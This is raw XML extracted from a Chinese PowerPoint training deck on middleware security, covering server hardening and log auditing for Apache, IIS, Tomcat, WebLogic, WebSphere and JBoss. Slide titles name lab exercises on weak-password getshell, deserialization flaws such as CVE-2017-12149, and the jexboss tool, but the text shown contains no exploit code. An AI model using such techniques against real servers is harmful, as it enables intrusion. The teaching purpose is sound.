                <a:lnTo>
                  <a:pt x="5830074" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830074" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5830570" h="1825625">
                <a:moveTo>
                  <a:pt x="9525" y="1820646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1820646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5830570" h="1825625">
                <a:moveTo>
                  <a:pt x="5820549" y="1820646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1820646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820549" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820549" y="1820646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5830570" h="1825625">
                <a:moveTo>
                  <a:pt x="5830074" y="1820646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5820549" y="1820646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825312" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830074" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830074" y="18206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84861" y="3568737"/>
            <a:ext cx="206946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r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>%S	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sessionID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4861" y="3812578"/>
            <a:ext cx="34010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5615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日志和时间，使用通常的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>格</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>式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38581" y="4300258"/>
            <a:ext cx="165036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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>请求的ＵＲＩ路</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>径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3496" y="4544098"/>
            <a:ext cx="165036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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>本地服务器的名</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>称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4860" y="4056417"/>
            <a:ext cx="5424411" cy="12360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2130" algn="l"/>
              </a:tabLst>
            </a:pP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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>认证以后的远端用户（如果存在的话，否则为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="1155" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>）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%U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%v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%T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15721" y="4787937"/>
            <a:ext cx="2869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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>处理请求的时间，以毫秒为单</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>位 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>处理请求的时间，以秒为单</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>位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13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4088</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>1018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3" baseType="lpstr">
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Droid Sans Fallback</vt:lpstr>
      <vt:lpstr>Noto Sans CJK JP Regular</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>中间件安全基础</vt:lpstr>
      <vt:lpstr>模块说明</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>前置知识</vt:lpstr>
      <vt:lpstr>主流的中间件</vt:lpstr>
      <vt:lpstr>中间件的分类</vt:lpstr>
      <vt:lpstr>中间件的分类</vt:lpstr>
      <vt:lpstr>中间件的分类</vt:lpstr>
      <vt:lpstr>中间件的分类</vt:lpstr>
      <vt:lpstr>中间件的安全问题</vt:lpstr>
      <vt:lpstr>主流的中间件</vt:lpstr>
      <vt:lpstr>Apache</vt:lpstr>
      <vt:lpstr>Apache服务器的安全设置</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr> 禁止 Apache服务器列表显示文件</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Apache服务器文件名解析漏洞</vt:lpstr>
      <vt:lpstr>Apache 服务器日志审计</vt:lpstr>
      <vt:lpstr>Apache 服务器日志审计</vt:lpstr>
      <vt:lpstr>Apache 服务器日志审计</vt:lpstr>
      <vt:lpstr>Apache 服务器日志审计</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>IIS服务器配置 – 身份认证</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>IIS6，IIS7的文件名解析漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr> 2 、IIS写权限漏洞利用过程</vt:lpstr>
      <vt:lpstr> IIS6 存 在 的 短 文 件 名 漏 洞 （2012 年 7 月 ， 由 Soroush Dalili 发 现 ）  https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/</vt:lpstr>
      <vt:lpstr> 利用“~”字符猜解暴露短文件/文件夹名</vt:lpstr>
      <vt:lpstr>IIS服务器日志审计方法</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr> 根目录下有bin,conf,lib,logs,temp,webapps,work 7个文件夹，以及一些文件： </vt:lpstr>
      <vt:lpstr> 根目录下有bin,conf,lib,logs,temp,webapps,work 7个文件夹，以及一些文件： </vt:lpstr>
      <vt:lpstr> 根目录下有bin,conf,lib,logs,temp,webapps,work 7个文件夹，以及一些文件： </vt:lpstr>
      <vt:lpstr>Tomcat服务器的安全设置</vt:lpstr>
      <vt:lpstr> 安装目录及权限（/usr/share/tomcat）：</vt:lpstr>
      <vt:lpstr>修改Tomcat服务器后台管理地址和管理账号密码</vt:lpstr>
      <vt:lpstr>以tomcat用户运行</vt:lpstr>
      <vt:lpstr> 在 Tomcat 8 的 bin 目录下添加启动配置 setenv.sh 文件</vt:lpstr>
      <vt:lpstr> 配置 Tomcat 8 为 systemctl 服务，在 /usr/lib/systemd/system 下创建文件tomcat.service</vt:lpstr>
      <vt:lpstr>修改Tomcat服务器后台管理地址和管理账号密码</vt:lpstr>
      <vt:lpstr>隐藏Tomcat版本信息的方法</vt:lpstr>
      <vt:lpstr>Tomcat 如何关闭不必要的接口和功能</vt:lpstr>
      <vt:lpstr>禁止目录列表，防止文件名泄露</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Tomcat样例目录session操纵漏洞</vt:lpstr>
      <vt:lpstr>Tomcat样例目录session操纵漏洞</vt:lpstr>
      <vt:lpstr>Tomcat服务器的日志审计方法</vt:lpstr>
      <vt:lpstr>Tomcat服务器访问日志</vt:lpstr>
      <vt:lpstr>Tomcat服务器运行日志</vt:lpstr>
      <vt:lpstr>Tomcat日志的审计方法</vt:lpstr>
      <vt:lpstr>实验-Tomcat弱口令getshell</vt:lpstr>
      <vt:lpstr>实验-Tomcat弱口令getshell</vt:lpstr>
      <vt:lpstr>实验-Tomcat弱口令getshell</vt:lpstr>
      <vt:lpstr>实验-Tomcat弱口令getshell</vt:lpstr>
      <vt:lpstr>Weblogic</vt:lpstr>
      <vt:lpstr>Weblogic 的安全设置</vt:lpstr>
      <vt:lpstr>Weblogic 的安全设置</vt:lpstr>
      <vt:lpstr> 更改控制台目录名</vt:lpstr>
      <vt:lpstr> 删除内置应用</vt:lpstr>
      <vt:lpstr> 启用管理端口,使用https访问。例：https://x.x.x.x:9002/console/</vt:lpstr>
      <vt:lpstr> 方法二：通过管理控制台配置</vt:lpstr>
      <vt:lpstr>修改Weblogic的默认开放端口</vt:lpstr>
      <vt:lpstr>修改Weblogic的默认开放端口</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>禁止Weblogic列表显示文件</vt:lpstr>
      <vt:lpstr>Weblogic 后台获取权限的方法</vt:lpstr>
      <vt:lpstr>Weblogic 后台获取权限的方法</vt:lpstr>
      <vt:lpstr>Weblogic 存在的SSRF漏洞</vt:lpstr>
      <vt:lpstr>实验-Weblogic XMLDecoder 反序列化漏洞</vt:lpstr>
      <vt:lpstr>实验-Weblogic XMLDecoder 反序列化漏洞</vt:lpstr>
      <vt:lpstr>实验 cve-2017-3248</vt:lpstr>
      <vt:lpstr>weblogic的其他反序列化漏洞</vt:lpstr>
      <vt:lpstr>实验 cve-2017-3248</vt:lpstr>
      <vt:lpstr>实验-常规渗透测试环境</vt:lpstr>
      <vt:lpstr>实验-常规渗透测试环境</vt:lpstr>
      <vt:lpstr>反序列化漏洞对Weblogic的影响</vt:lpstr>
      <vt:lpstr>WebLogic访问日志</vt:lpstr>
      <vt:lpstr>Websphere管理的使用</vt:lpstr>
      <vt:lpstr>Websphere管理的使用</vt:lpstr>
      <vt:lpstr> jython方式：</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Websphere后台获取权限的方法</vt:lpstr>
      <vt:lpstr>反序列化漏洞对Websphere的影响</vt:lpstr>
      <vt:lpstr>Websphere的日志审计</vt:lpstr>
      <vt:lpstr>Jboss 的安全设置</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr> 设置jmx-console密码的方法：类似web-console的设置（1、2相同，只是去掉jmx-console 的注释）</vt:lpstr>
      <vt:lpstr>Jboss开启日志功能的方法</vt:lpstr>
      <vt:lpstr>Jboss开启日志功能的方法</vt:lpstr>
      <vt:lpstr>Jboss开启日志功能的方法</vt:lpstr>
      <vt:lpstr>Jboss开启日志功能的方法</vt:lpstr>
      <vt:lpstr>Jboss设置通讯协议，开启HTTPS访问</vt:lpstr>
      <vt:lpstr>Jboss修改Web的访问端口</vt:lpstr>
      <vt:lpstr>实验-JBoss JMXInvokerServlet 反序列化漏洞</vt:lpstr>
      <vt:lpstr>反序列化漏洞对Jboss的影响</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞的影响</vt:lpstr>
      <vt:lpstr>JMXInvokerServlet/jmx-console/web- console漏洞利用与防范</vt:lpstr>
      <vt:lpstr>漏洞利用与防范：jexboss使用方法</vt:lpstr>
      <vt:lpstr>日志审核查看</vt:lpstr>
      <vt:lpstr>实验-JBoss 5.x/6.x反序列化漏洞（CVE-2017-12149）</vt:lpstr>
      <vt:lpstr>实验-JBoss 5.x/6.x反序列化漏洞（CVE-2017-12149）</vt:lpstr>
      <vt:lpstr>实验-JBoss 5.x/6.x反序列化漏洞（CVE-2017-12149）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中间件安全基础</dc:title>
  <dc:creator>Eric K</dc:creator>
  <cp:lastModifiedBy>Eric K</cp:lastModifiedBy>
  <cp:revision>68</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-08T14:59:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-27T05:45:17Z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2018-07-08T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>